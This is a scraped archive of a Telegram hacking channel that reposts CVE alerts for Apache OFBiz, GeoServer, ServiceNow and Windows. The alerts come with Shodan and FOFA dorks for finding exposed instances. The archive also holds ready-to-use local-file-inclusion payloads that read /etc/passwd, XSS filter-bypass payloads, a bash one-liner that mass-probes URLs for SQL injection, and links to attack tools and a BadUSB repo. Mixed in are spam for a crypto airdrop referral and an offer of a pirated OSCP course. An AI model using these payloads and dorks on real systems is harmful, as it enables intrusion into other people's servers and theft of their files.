es
Feedback
HackTheBox Academy

HackTheBox Academy

Canal cerrado

🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1

Mostrar más
3 327
Suscriptores
Sin datos24 horas
-207 días
-9330 días
Archivo de publicaciones
😄😃😄
😄😃😄

↔️ CVE-2024-32113 ❗️ A New Pre-Authentication Remote Code Execution Vulnerability Has Been Disclosed In The Apache OFBiz Open
↔️ CVE-2024-32113 ❗️ A New Pre-Authentication Remote Code Execution Vulnerability Has Been Disclosed In The Apache OFBiz Open-Source Enterprise Resource That Could Allow Threat Actors To Achieve Remote Code Execution On Affected Instances. 🖥 EXPLOIT - POC 🖥 Batch SCAN #Vulnerability #CVE #Exploit #Ethical_Hacker #POC #Pentest #RCE ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-38856 ❗️ This vulnerability could allow unauthorized users to execute screen rendering code on affected Apache OF
↔️ CVE-2024-38856 ❗️ This vulnerability could allow unauthorized users to execute screen rendering code on affected Apache OFBiz installations. This could potentially lead to unauthorized access to sensitive information, manipulation of data, or execution of unintended operations within the OFBiz application. 🖥 EXPLOIT - POC 🔎hunter.how:
product.name="OFBiz"
🔎fofa.info:
app="Apache_OFBiz"
#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

@HackTheBox_Academy -- OSCP PEN-200.7z1789.87 MB

💥 PEN - 200 💥 🔲 Penetration Testing with Kali Linux. 📌 https://www.offsec.com/courses/pen-200 #Course #Kali #Ethical_Hack
💥 PEN - 200 💥 🔲 Penetration Testing with Kali Linux. 📌 https://www.offsec.com/courses/pen-200 #Course #Kali #Ethical_Hacker #Pentest #PWK #Hacking #FREE ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

💥 PEN - 200 💥 🔲 Penetration Testing with Kali Linux. 📌 https://www.offsec.com/courses/pen-200 #Course #Kali #Ethical_Hack
💥 PEN - 200 💥 🔲 Penetration Testing with Kali Linux. 📌 https://www.offsec.com/courses/pen-200 #Course #Kali #Ethical_Hacker #Pentest #PWK #Hacking #FREE ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-38100 ❗️ Windows File Explorer Elevation of Privilege Vulnerability Allows To Leak a User's NetNTLM Hash From Any Session On The Computer, Even If User are On a Low-Privileged.. 🖥 EXPLOIT - POC #CVE #Exploit #Vulnerability #Microsoft #POC #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-36401 ❗️ By Exploiting this vulnerability, an attacker can send a POST request containing a malicious XPath expre
↔️ CVE-2024-36401 ❗️ By Exploiting this vulnerability, an attacker can send a POST request containing a malicious XPath expression, which can result in arbitrary command execution as #root on the system running GeoServer. 🖥 EXPLOIT - POC 🔎 FOFA Query:
app="GeoServer"
#Exploit #POC #Vulnerability #Pentest #Ethical_Hacker #CVE ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🟢 #WhatsApp_Messenger New Vulnerability Allow Attacker To Runs Python and PHP Code On Victim's Machine. #Vulnerability #Course #Ethical_hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-4879 ❗️ CVE-2024-4879 Could Allow An Unauthenticated User To Remotely Execute Code Within The Now Platform. This
↔️ CVE-2024-4879 ❗️ CVE-2024-4879 Could Allow An Unauthenticated User To Remotely Execute Code Within The Now Platform. This Vulnerability Exploits Three Issues By Chaining Them Together (Title Injection, Template Injection Mitigation Bypass, and Filesystem Filter Bypass) To Access ServiceNow Data. 🖥 EXPLOIT - POC 🟢 SHODAN DORK:
server: ServiceNow "200"
#CVE #Vulnerability #Exploit #Ethical_Hacker #PenTest ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

Repost from GitHub BOX
New #CVE repository: Title: CVE-2024-20666 Link: https://github.com/HYZ3K/CVE-2024-20666

Repost from GitHub BOX
New #CVE repository: Title: cve-2024-20666 Link: https://github.com/HYZ3K/cve-2024-20666

🕷 Some #File_Inclusion Payload. 🍎 Null byte Encoding:
http://example.com/index.php?page=../../../etc/passwd%00
🍎 Double Encoding:
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
🍎 UTF-8 Encoding:
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
#LFI #Tricks #Bypass #Payload #Ethical_Hacker #Web #BugBounty ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

I Need 3 Person To join With My Link.😁 also 2 person joined last night 🧡 who ever joined This AirDrop. Send Message To Admin And Get OSCP_PEN_200 As #FREE.💥🔥💥 Admin: @NullByte0x1 ❗️ Who Ever Play Airdrops know That Your Username is Shown In My Profile Game As Refferal's Friends... SO IF U REALLY JOIN THE GAME WITH MY LINK, SEND ME A MESSAGE. ****** ******

#FREE_POST #AIRDROP 💰 https://t.me/dogshouse_bot/join?startapp=PhaynrstSSin71Ib3lJA6Q ⚡️NO NEED TO PLAY GAME. ⚡️HOW LONG IS
#FREE_POST #AIRDROP 💰 https://t.me/dogshouse_bot/join?startapp=PhaynrstSSin71Ib3lJA6Q ⚡️NO NEED TO PLAY GAME. ⚡️HOW LONG IS YOUR TELEGRAM ACCOUNT?? ⚡️GET TOKENS BASE ON YOUR ACCOUNT AGE..

https://t.me/dogshouse_bot/join?startapp=PhaynrstSSin71Ib3lJA6Q NO NEED TO PLAY. HOW LONG IS YOUR TELEGRAM ACCOUNT?? GET TOKE
https://t.me/dogshouse_bot/join?startapp=PhaynrstSSin71Ib3lJA6Q NO NEED TO PLAY. HOW LONG IS YOUR TELEGRAM ACCOUNT?? GET TOKENS BASE ON YOUR ACCOUNT AGE..

💎 1Line BASH To Perform #SQL_Injection For BugBounties Friends. cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort
💎 1Line BASH To Perform #SQL_Injection For BugBounties Friends.
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mVulnerable to SQLI Injection\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done
#Tricks #SQL_Injection #Web #PenTest #Ethical_Hacker #BugBounty ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🕷 Some #XSS Payload.
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
#XSS #Tricks #Bypass #Payload #Ethical_Hacker #Web #BugBounty ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🩸🩸🩸🩸🩸🩸 🕷 Automated #XSS Testing 🕷 ⚡️ https://github.com/Stuub/Helios 👩‍💻 Usage: git clone https://github.com/Stuub/
🩸🩸🩸🩸🩸🩸 🕷 Automated #XSS Testing 🕷 ⚡️ https://github.com/Stuub/Helios 👩‍💻 Usage:
git clone https://github.com/Stuub/Helios.git
cd Helios
pip install -r requirements.txt
python3 helios.py [target_url] [options] 
#Tools #PenTest #XSS #Ethical_Hacker #Web #Scanner ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

Repost from GitHub BOX
New #HACKING repository: Title: Rubber-Ducky-Bad-USB Link: https://github.com/isPique/Rubber-Ducky-Bad-USB